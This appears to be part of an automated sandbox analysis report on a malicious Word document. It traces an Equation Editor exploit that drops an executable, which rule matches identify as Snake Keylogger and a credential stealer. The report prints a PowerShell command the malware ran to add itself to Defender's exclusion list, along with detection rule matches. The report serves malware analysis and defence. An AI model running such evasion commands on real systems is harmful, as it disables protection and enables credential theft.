Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062EE10	7_2_0062EE10
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00623910	7_2_00623910
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062C010	7_2_0062C010
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062461A	7_2_0062461A
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062B318	7_2_0062B318
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006268E2	7_2_006268E2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00625BE0	7_2_00625BE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062E4E0	7_2_0062E4E0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006268E8	7_2_006268E8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006275F0	7_2_006275F0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00628FF0	7_2_00628FF0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006282F6	7_2_006282F6
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006282F8	7_2_006282F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062AEC0	7_2_0062AEC0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006241C0	7_2_006241C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062C8C1	7_2_0062C8C1
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006234C8	7_2_006234C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062BBC8	7_2_0062BBC8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00624ECE	7_2_00624ECE
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00625BD2	7_2_00625BD2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062C8D0	7_2_0062C8D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006241D0	7_2_006241D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00624ED8	7_2_00624ED8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062D5D8	7_2_0062D5D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062FBD8	7_2_0062FBD8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006298A2	7_2_006298A2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00627EA0	7_2_00627EA0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062F2A8	7_2_0062F2A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00628BA8	7_2_00628BA8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006298B0	7_2_006298B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062AEB0	7_2_0062AEB0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062BBB8	7_2_0062BBB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006234B9	7_2_006234B9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062D180	7_2_0062D180
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00624A80	7_2_00624A80
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00626480	7_2_00626480
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00625788	7_2_00625788
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0062DE88	7_2_0062DE88
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00627188	7_2_00627188
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00626490	7_2_00626490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00627198	7_2_00627198
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00628B98	7_2_00628B98
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00627E9E	7_2_00627E9E
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00692E78	7_2_00692E78
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00690040	7_2_00690040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00693558	7_2_00693558
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00693C38	7_2_00693C38
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00694318	7_2_00694318
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006949F8	7_2_006949F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00690ED8	7_2_00690ED8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006950D8	7_2_006950D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006957B8	7_2_006957B8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00692E68	7_2_00692E68
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_0069354A	7_2_0069354A
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00693C28	7_2_00693C28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00692121	7_2_00692121
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00692130	7_2_00692130
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00694308	7_2_00694308
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00692B00	7_2_00692B00
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006949E9	7_2_006949E9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_00692AF2	7_2_00692AF2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006950C8	7_2_006950C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_006957A8	7_2_006957A8

Source: na.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: pKL9HXcZosWfPt1[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: cmnjgwhesilo61000.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, hxMIVi9pYAP9wjI5QI.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, hxMIVi9pYAP9wjI5QI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs	Security API names: _0020.SetAccessControl
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs	Security API names: _0020.AddAccessRule
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, hxMIVi9pYAP9wjI5QI.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, hxMIVi9pYAP9wjI5QI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs	Security API names: _0020.SetAccessControl
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@9/14@26/9

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$na.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRB5C7.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................).........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................).........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................).........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................).........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................).........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................*.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n................................*.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............................."*.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........B*.........................s............H....... .......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................p.......R*.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................p.......m*.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................p........*.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......*.........................s............H.......$.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................p........*.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................p........*.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................p........*.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................p........*.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................*.........................s....................l.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................+.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P..............................+.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................'+.........................s............H...............................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: na.doc

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
